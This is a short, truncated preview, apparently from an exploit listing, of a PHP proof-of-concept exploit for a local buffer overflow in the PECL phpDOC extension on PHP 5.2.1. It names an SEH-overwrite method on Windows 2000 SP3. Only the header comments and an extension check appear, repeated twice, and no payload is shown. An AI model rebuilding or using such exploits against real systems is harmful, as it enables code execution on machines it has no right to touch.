<?php
//PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit
//WIN 2K SP3 version / seh overwrite method
//to be launched from the cli
// by rgod
// site: http://retrogod.altervista.org
if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.")...
//PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit
//WIN 2K SP3 version / seh overwrite method
//to be launched from the cli
// by rgod
// site: http://retrogod.altervista.org
if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.")...
[ more ]